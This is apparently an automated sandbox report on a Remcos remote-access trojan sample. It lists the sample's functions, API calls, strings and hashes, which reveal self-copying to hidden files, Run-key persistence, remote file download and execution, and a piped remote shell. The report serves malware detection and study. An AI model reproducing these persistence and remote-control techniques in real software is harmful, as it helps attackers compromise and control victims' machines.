                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                • String ID: (x$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\1m70ggeepT.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-3XK1S0$Software\$User$dMG$del$del$exepath$licence$license_code.txt$Mw
                                • API String ID: 2830904901-3220161554
                                • Opcode ID: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                • Opcode Fuzzy Hash: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040CDF9 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 203fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • _wcslen.LIBCMT ref: 0040CE07
                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,(x,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                • CopyFileW.KERNELBASE(C:\Users\user\Desktop\1m70ggeepT.exe,00000000,00000000,00000000,00000000,00000000,?,(x,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                • _wcslen.LIBCMT ref: 0040CEE6
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\1m70ggeepT.exe,00000000,00000000), ref: 0040CF84
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                • _wcslen.LIBCMT ref: 0040CFC6
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,(x,0000000E), ref: 0040D02D
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                • ExitProcess.KERNEL32 ref: 0040D062
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                • String ID: (x$6$C:\Users\user\Desktop\1m70ggeepT.exe$del$hdF$open$Mw
                                • API String ID: 1579085052-932157811
                                • Opcode ID: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                • Opcode Fuzzy Hash: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B2C3 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,(x,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$(x$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-3884541626
                                • Opcode ID: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413814 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 656 413814-413827 RegCreateKeyW 657 413866 656->657 658 413829-413864 call 40247c call 401f04 RegSetValueExW RegCloseKey 656->658 660 413868-413876 call 401f09 657->660 658->660
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,Mw,759237E0,?), ref: 0041384D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,Mw,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                • Mw, xrefs: 00413814
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Mw
                                • API String ID: 1818849710-2982982977
                                • Opcode ID: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 666 40d069-40d095 call 401fab CreateMutexA GetLastError
                                APIs
                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: Rmc-3XK1S0
                                • API String ID: 1925916568-1463236701
                                • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 697 4135a6-4135d2 RegOpenKeyExA 698 4135d4-4135fc RegQueryValueExA RegCloseKey 697->698 699 413607 697->699 700 413609 698->700 701 4135fe-413605 698->701 699->700 702 41360e-41361a call 402093 700->702 701->702
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F3DD Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                • _free.LIBCMT ref: 0044F41A
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnvironmentStrings$Free_free
                                • String ID:
                                • API String ID: 2716640707-0
                                • Opcode ID: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                • Opcode Fuzzy Hash: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 705 413549-413571 RegOpenKeyExA 706 4135a0 705->706 707 413573-41359e RegQueryValueExA RegCloseKey 705->707 708 4135a2-4135a5 706->708 707->708
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                • RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 723 40165e-401664 724 401666-401668 723->724 725 401669-401674 723->725 726 401676 725->726 727 40167b-401685 725->727 726->727 728 401687-40168d 727->728 729 4016a8-4016a9 call 4344ea 727->729 728->729 730 40168f-401694 728->730 733 4016ae-4016af 729->733 730->726 732 401696-4016a6 call 4344ea 730->732 735 4016b1-4016b3 732->735 733->735
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 737 446137-446143 738 446175-446180 call 4405dd 737->738 739 446145-446147 737->739 746 446182-446184 738->746 741 446160-446171 RtlAllocateHeap 739->741 742 446149-44614a 739->742 743 446173 741->743 744 44614c-446153 call 445545 741->744 742->741 743->746 744->738 749 446155-44615e call 442f80 744->749 749->738 749->741
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                • API String ID: 1067849700-181434739
                                • Opcode ID: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                • Opcode Fuzzy Hash: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
